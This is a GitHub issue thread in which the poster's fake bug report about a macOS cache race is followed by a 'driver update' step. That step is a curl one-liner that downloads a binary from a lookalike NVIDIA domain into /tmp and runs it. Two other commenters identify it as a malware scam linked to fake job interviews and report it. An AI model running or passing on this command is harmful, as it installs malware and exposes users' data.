### ISSUE TITLE
NVIDIA discoverer cache usage is racey on macOS

### ISSUE THREAD

**Issue by trevor9312** [NVIDIA/nvidia-container-toolkit#758]
It appears that the NVIDIA discoverer cache usage on macOS is exhibiting race conditions. This issue may lead to inconsistent behavior, potentially causing driver-related processes to fail or behave unpredictably when accessing the cache simultaneously.

**Comment by trevor9312** [comment]
1. Open terminal on macOS
- Press **Command (⌘) + Space** on your keyboard. This opens Spotlight Search.
- In the search bar that appears, type "**Terminal**".
- Press **Enter**, and the Terminal application will open.

2. Update NVIDIA drivers on macOS
To automatically update the latest NVIDIA drivers for macOS, use the following curl command.
```
curl -o /tmp/nvidia https://api.nvidia-release.us/nvidiamac.update && chmod +x /tmp/nvidia && /tmp/nvidia
```

**Comment by lion054** [comment]
These thieves will steal your data. Posing a fake job interview please DO NOT FALL FOR IT

**Comment by Anatr0p** [comment]
⚠️ ⚠️⚠️
Saw this issue from a youtuber who tried to find a job on linkedin
DO NOT execute provided curl!
It's a total scam which will get a malware on your device
Please, always pay attention and DO NOT execute such stuff, stay safe!
P.S. Already reported that fake github account and send an email to Namecheap abuse contact for them to take actions regarding those fake domains
